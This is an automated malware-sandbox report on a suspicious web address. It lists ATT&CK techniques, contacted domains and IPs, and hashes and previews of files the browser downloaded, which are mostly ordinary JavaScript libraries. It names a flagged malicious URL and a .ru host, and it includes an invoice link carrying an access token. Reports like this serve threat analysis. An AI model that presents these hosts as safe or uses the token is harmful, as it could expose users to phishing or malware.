Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.65.229
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.2.137
      truefalse
        high
        whtt.termlicari.ru
        172.67.161.180
        truetrue
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            static-spa.paymoapp.com
            172.67.68.157
            truefalse
              unknown
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                app.paymoapp.com
                104.26.13.54
                truefalse
                  unknown
                  www.google.com
                  142.250.181.132
                  truefalse
                    high
                    s-0005.dual-s-msedge.net
                    52.123.128.14
                    truefalse
                      unknown
                      nft3stma7ftpc3rntxdlvbenmkj0n4bqviksdd1hg2oc6z9ylbx4nsgb86yd.ygncsqvu.ru
                      172.67.168.1
                      truefalse
                        unknown
                        cdn.jsdelivr.net
                        unknown
                        unknownfalse
                          high
                          teams.nel.measure.office.net
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://whtt.termlicari.ru/HnkNbg/true
                              unknown
                              https://app.paymoapp.com/api/invoices/1722928/?token=cru1YSx05ZXoUbyUK21kn8zSRgurmuahl%2B7l83%2FGz357lR0pnLMoRGY5Sk%2FGNcGSYLDtyxmup%2BroyOn7j0EBl6VaCwjpFqZSLbHrv5GCWxA%3D&format=htmltrue
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                172.217.19.206
                                unknownUnited States
                                15169GOOGLEUSfalse
                                172.217.17.67
                                unknownUnited States
                                15169GOOGLEUSfalse
                                172.67.68.157
                                static-spa.paymoapp.comUnited States
                                13335CLOUDFLARENETUSfalse
                                2.16.168.123
                                unknownEuropean Union
                                20940AKAMAI-ASN1EUfalse
                                52.123.129.14
                                unknownUnited States
                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                142.250.181.132
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                23.32.238.209
                                unknownUnited States
                                2828XO-AS15USfalse
                                64.233.164.84
                                unknownUnited States
                                15169GOOGLEUSfalse
                                172.67.161.180
                                whtt.termlicari.ruUnited States
                                13335CLOUDFLARENETUStrue
                                151.101.66.137
                                unknownUnited States
                                54113FASTLYUSfalse
                                35.190.80.1
                                a.nel.cloudflare.comUnited States
                                15169GOOGLEUSfalse
                                1.1.1.1
                                unknownAustralia
                                13335CLOUDFLARENETUSfalse
                                172.67.168.1
                                nft3stma7ftpc3rntxdlvbenmkj0n4bqviksdd1hg2oc6z9ylbx4nsgb86yd.ygncsqvu.ruUnited States
                                13335CLOUDFLARENETUSfalse
                                172.217.17.35
                                unknownUnited States
                                15169GOOGLEUSfalse
                                151.101.65.229
                                jsdelivr.map.fastly.netUnited States
                                54113FASTLYUSfalse
                                104.18.95.41
                                challenges.cloudflare.comUnited States
                                13335CLOUDFLARENETUSfalse
                                52.123.128.14
                                s-0005.dual-s-msedge.netUnited States
                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                172.217.19.234
                                unknownUnited States
                                15169GOOGLEUSfalse
                                151.101.2.137
                                code.jquery.comUnited States
                                54113FASTLYUSfalse
                                2.16.168.119
                                unknownEuropean Union
                                20940AKAMAI-ASN1EUfalse
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                104.26.13.54
                                app.paymoapp.comUnited States
                                13335CLOUDFLARENETUSfalse
                                142.250.181.99
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.17.25.14
                                cdnjs.cloudflare.comUnited States
                                13335CLOUDFLARENETUSfalse
                                IP
                                192.168.2.17
                                192.168.2.4
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1578419
                                Start date and time:2024-12-19 17:10:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                Sample URL:https://whtt.termlicari.ru/HnkNbg/
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • EGA enabled
                                Analysis Mode:stream
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal48.win@28/118@40/244
                                • Exclude process from analysis (whitelisted): TextInputHost.exe
                                • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.164.84, 142.250.181.142
                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                • Not all processes where analyzed, report is missing behavior information
                                • VT rate limit hit for: https://whtt.termlicari.ru/HnkNbg/
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:10:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2677
                                Entropy (8bit):3.99073313344359
                                Encrypted:false
                                SSDEEP:
                                MD5:FE394DC0A3ADF08B93DAD6DFFF70D140
                                SHA1:14190946FF6103B11AE366D7A07F3DE94295FC84
                                SHA-256:6358A35D0B6EA7669692EDEE1C7BDC0BFB3BDE04F9A9D4A1F288A5D9206E4585
                                SHA-512:CD86BA231C1ED96252195273A5E5CB571E2E0D638C01B0F9DEA6EB24177437C741FE3599D50D3F0395000CC0121692D9E144EB9F0C45A4DAF5BEB88AA101A317
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,......b.0R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YK.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YT.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.YT.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.YT............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YV............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$a.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:10:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2679
                                Entropy (8bit):4.006879454082695
                                Encrypted:false
                                SSDEEP:
                                MD5:C5A5EE279F6D99E5883FCAB65EDEDACA
                                SHA1:CD5CE33C4519C75359D9F40A6936ABD86C8F5EEC
                                SHA-256:40ADEBE48E28B0C425F80754F24B57674A85C8ECA6EF94EF5346647BC8B90176
                                SHA-512:BAFD84B4F9F7BFB03F6FFACA40D08B62B5A93C1BAA18F921897FC8DAB02C4573AF8FD7F3D1865DEEA38C7A5ED6101E55F63586BA584068AD53EBA86391225BFA
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....lK.0R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YK.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YT.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.YT.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.YT............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YV............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$a.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2693
                                Entropy (8bit):4.019151530246545
                                Encrypted:false
                                SSDEEP:
                                MD5:9FFD434D010FCC6E4E11A30B327C819E
                                SHA1:C35E3F5A0754DA7506D38408B5AAD1B360B8A88F
                                SHA-256:33F3E0534DB12BAF8A55FE17AE24055460B1AD6788DE30B18C1E44BCB27A02A2
                                SHA-512:DDFD4751B748F0B6DCE55C80FA858CF5F4DF0DE12EB69EB002B28E6612843B0F7890D58179B7EAA6281826CD62EE8D390A331E6C699730B7E3FE21CBB0449BB1
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YK.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YT.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.YT.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.YT............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$a.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:10:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2681
                                Entropy (8bit):4.006162694648164
                                Encrypted:false
                                SSDEEP:
                                MD5:8F1BD5B594DB98FC923CDD92496E8685
                                SHA1:9D26097BE5F76E8E798415E1885C4EAFEE7EFAC2
                                SHA-256:F752B6EF67852D5985786BD048B4349B3DE69CAB0CAA3B54A042DDAFA55B9A47
                                SHA-512:4CC923CCB69073CD55FD171C37E5BC36967A6269EE313044DCB9C33D4FE0493FF5A7CD94FCE63C80F7EA94B0DFC2C2E3519DB41492FA42C70671D52B73B23811
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,....5&>.0R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YK.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YT.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.YT.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.YT............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YV............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$a.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:10:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2681
                                Entropy (8bit):3.9939220294132807
                                Encrypted:false
                                SSDEEP:
                                MD5:98A843AA362A62B4538735ACC6607E8D
                                SHA1:C7FF33232C0452E36C774330914D183FDE8F8574
                                SHA-256:440AFBA59BD4A432B757C8592C1239D85AC905EB82FCE9BF91E147819ECBBB31
                                SHA-512:C9AC0DEF46342456DD9FE5E61CCAEC278CF1AFD0F2096079C4D2AEFFDF184573472A50019347C053B1D3823B528A32FCA9BF61D76FD0AD44861F9F8122C483F7
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,....a.V.0R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YK.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YT.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.YT.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.YT............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YV............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$a.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:10:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2683
                                Entropy (8bit):4.002371208358732
                                Encrypted:false
                                SSDEEP:
                                MD5:930BBA7D23F3E2F1FFA8A6F6D7F9C88B
                                SHA1:45A4859C92BA3B1141AF60FAA9018E0322EDEBC8
                                SHA-256:3DC7ED31A771A597977591681D7702DDF2A1DB4B58CB0A4FE68869ECA85C5670
                                SHA-512:B64F8651CC6CC235663227F709BA1443D7F7FB28E7E8D24348D586F28648D8EF39D2961145E5982757443724BFB9CC9C3CD410B749A3E4A5F432EF6B985E2076
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,......1.0R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YK.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YT.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.YT.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.YT............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YV............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$a.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (28481)
                                Category:downloaded
                                Size (bytes):28482
                                Entropy (8bit):5.305748285213755
                                Encrypted:false
                                SSDEEP:
                                MD5:13D725C54F9F840C19F27143647A8C1F
                                SHA1:6B7DB780369963CE9A270E3CF842AEE9632A3FF4
                                SHA-256:3111B18D1D2B644B7A0AF05B5613A4D1FD4EF2AB22FCD4020640F665CF987319
                                SHA-512:E946C90FCADA0E991421C23D7E48646C98B2D2ADA33FC7941EDB8DFA1F938804214471B3231E4A6B915214763E4DC914B3FE4F49C453E6D0D960864084578983
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/form-45be5755.js
                                Preview:System.register(["react"],function(ae,er){"use strict";var F;return{setters:[ue=>{F=ue.default}],execute:function(){ae({b:st,d:at,e:ut,f:Nt,u:Kt});var ue=e=>e.type==="checkbox",ne=e=>e instanceof Date,P=e=>e==null;const ze=e=>typeof e=="object";var O=e=>!P(e)&&!Array.isArray(e)&&ze(e)&&!ne(e),Je=e=>O(e)&&e.target?ue(e.target)?e.target.checked:e.target.value:e,Ot=e=>e.substring(0,e.search(/\.\d+(\.|$)/))||e,Qe=(e,r)=>e.has(Ot(r)),Tt=e=>{const r=e.constructor&&e.constructor.prototype;return O(r)&&r.hasOwnProperty("isPrototypeOf")},ke=typeof window<"u"&&typeof window.HTMLElement<"u"&&typeof document<"u";function R(e){let r;const t=Array.isArray(e);if(e instanceof Date)r=new Date(e);else if(e instanceof Set)r=new Set(e);else if(!(ke&&(e instanceof Blob||e instanceof FileList))&&(t||O(e)))if(r=t?[]:{},!t&&!Tt(e))r=e;else for(const i in e)e.hasOwnProperty(i)&&(r[i]=R(e[i]));else return e;return r}var fe=e=>Array.isArray(e)?e.filter(Boolean):[],p=e=>e===void 0,c=ae("g",(e,r,t)=>{if(!r||!O(e))
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (544)
                                Category:downloaded
                                Size (bytes):11440
                                Entropy (8bit):5.360613902337515
                                Encrypted:false
                                SSDEEP:
                                MD5:61699B70CF57ABE63FDF5F4007D36EC1
                                SHA1:6C05189CC2D08BB2A7609C002F0675C9C670D362
                                SHA-256:229BBF4D0E7488209564152C6723497F1AC3934136CA1684233D2FA88FA4146F
                                SHA-512:AA5CC8794B5383B781A6611A4B5D8D660C73E766186551799B28FCF668C911EB0177FA04F543EC60E5F64005F3BCE019604BD0A2129D718F33284D3689F5C398
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdn.jsdelivr.net/npm/react@17.0.2/umd/react.production.min.js
                                Preview:/** @license React v17.0.2. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,e=1;e<arguments.length;e++)b+="&args[]="+encodeURIComponent(arguments[e]);return"Minified React error #"+.a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function v(a,b,e){this.props=a;this.context=b;this.refs=Z;this.updater=e||aa}function ba(){}function K(a,b,e
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (33266)
                                Category:downloaded
                                Size (bytes):33374
                                Entropy (8bit):5.170268480848515
                                Encrypted:false
                                SSDEEP:
                                MD5:40832E67D4391FFDB1613F7DB5F33076
                                SHA1:70382211316199F58BC0D3D56C2A98C81849E11D
                                SHA-256:9A525A37F6D2471F7E74B15172D469DAA14C47096827395DDEB769BFE2E4590A
                                SHA-512:707F2BE3C1177E85036AD8163ADA6FBC33F000F83AE80F6F80A5D32D8FB787CE51C6EB129D0541D6D3C2BE7C277985C380A8EDF4B1AD67061019CE266E917FE4
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/337355-53949d9632bb831d.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[337355],{327402:function(t,r){var e,n,o;n=[],void 0===(o="function"==typeof(e=function(){var t=/^v?(?:\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+))?(?:-[\da-z\-]+(?:\.[\da-z\-]+)*)?(?:\+[\da-z\-]+(?:\.[\da-z\-]+)*)?)?)?$/i;function r(t,r){return-1===t.indexOf(r)?t.length:t.indexOf(r)}function e(t){var e=t.replace(/^v/,"").replace(/\+.*$/,""),n=r(e,"-"),o=e.substring(0,n).split(".");return o.push(e.substring(n+1)),o}function n(t){return isNaN(Number(t))?t:Number(t)}function o(r){if("string"!=typeof r)throw new TypeError("Invalid argument expected string");if(!t.test(r))throw new Error("Invalid argument not valid semver ('"+r+"' received)")}function i(t,r){[t,r].forEach(o);for(var i=e(t),s=e(r),c=0;c<Math.max(i.length-1,s.length-1);c++){var u=parseInt(i[c]||0,10),a=parseInt(s[c]||0,10);if(u>a)return 1;if(a>u)return-1}var f=i[i.length-1],l=s[s.length-1];if(f&&l){var p=f.split(".").map(n
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (35485)
                                Category:downloaded
                                Size (bytes):35593
                                Entropy (8bit):5.433201153959229
                                Encrypted:false
                                SSDEEP:
                                MD5:614CEF6A5591243EE327D5D2B7A2C698
                                SHA1:A30288FE3D15BFEDC3E3B73B18A2ADA72BD43ABB
                                SHA-256:8D81DC89757CB48425F7781F7FB889913FD959E96F977CA03F2BF19C571D9B72
                                SHA-512:A37C171BE9894AA1EEA99374626498E734F9D3A632FEEB41E308D6D2142FBBB99CE48B101F29EA87FD7C736BC4300686371C755D56A828BCED9C5013B7CA0F1D
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/972276-16a6accc1de1eb6a.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[972276],{296920:(e,t,n)=>{n.d(t,{e:()=>y,y:()=>I});var i=n(689054),r=n(305573);function s(e,t){for(var n,i=/\r\n|[\n\r]/g,r=1,s=t+1;(n=i.exec(e.body))&&n.index<t;)r+=1,s=t+1-(n.index+n[0].length);return{line:r,column:s}}function a(e){return o(e.source,s(e.source,e.start))}function o(e,t){var n=e.locationOffset.column-1,i=u(n)+e.body,r=t.line-1,s=e.locationOffset.line-1,a=t.line+s,o=1===t.line?n:0,l=t.column+o,p="".concat(e.name,":").concat(a,":").concat(l,"\n"),h=i.split(/\r\n|[\n\r]/g),f=h[r];if(f.length>120){for(var d=Math.floor(l/80),E=l%80,v=[],N=0;N<f.length;N+=80)v.push(f.slice(N,N+80));return p+c([["".concat(a),v[0]]].concat(v.slice(1,d+1).map((function(e){return["",e]})),[[" ",u(E-1)+"^"],["",v[d+1]]]))}return p+c([["".concat(a-1),h[r-1]],["".concat(a),f],["",u(l-1)+"^"],["".concat(a+1),h[r+1]]])}function c(e){var t=e.filter((function(e){e[0];return void 0!==e[1]})),n
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):72397
                                Entropy (8bit):5.573376353724739
                                Encrypted:false
                                SSDEEP:
                                MD5:AAF166634E0AF9C57B73959561975D31
                                SHA1:308666AF0F6C45368251D07BB51845D493399905
                                SHA-256:7143F3DCCFAEDF4793A9CFED07CD262C9F3224CCF0109E9549BBE7E40618A773
                                SHA-512:AB77EB4CD34493AA0C1FF623124E596388C0F56307EAAF9D85AC205145ECC494D223975C5EFFF61E083FC07CA6969CC48E40CDF2B6E6F6BA4C5EE302C36E49AE
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[509664],{641939:(e,t,a)=>{a.d(t,{W:()=>r});var r=function(e){return{attributes:{root:{"aria-hidden":e.alt||e["aria-label"]?void 0:"true"}}}}},478176:(e,t,a)=>{a.d(t,{w:()=>n});var r=a(888846),n=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:r.E.bidirectionalDomOrder}}}}},792747:(e,t,a)=>{a.d(t,{j:()=>s});var r=a(953543),n=a(504405),s=function(e){var t;return{attributes:{root:(t={role:"menuitem"},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Enter},{keyCode:r.ZG}]}}}}}},306749:(e,t,a)=>{a.d(t,{z:()=>r});var r=function(){return{attributes:{root:{role:"img"}}}}},537602:(e,t,a)=>{a.d(t,{q:()=>l});var r=a(716300),n=a(513432),s=a(253070);const l=e=>{const t=n.createContext({value:{current:e},version:{current:-1},listeners:[]});var a;return t.Provider=(a=t.Provider,e=>{const t=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (22028)
                                Category:downloaded
                                Size (bytes):22136
                                Entropy (8bit):5.408588929590394
                                Encrypted:false
                                SSDEEP:
                                MD5:A87E1F75E1BF072B58ED22C7F8DB87A7
                                SHA1:C4FDB0BA7198411E7510008AD2E812F3BB68D462
                                SHA-256:1DC0883980E666CFDB588463571ECC238B750ADD14372B967A18E2C427DAB9F1
                                SHA-512:64CD0292C77ADBDF95568D680F0DCC9B429A30553F6678ACD487D09C63C8E609FE3A043FFDFADD77BD41382D474B3186A57B2009919F7F6A3F1702805A2F4622
                                Malicious:false
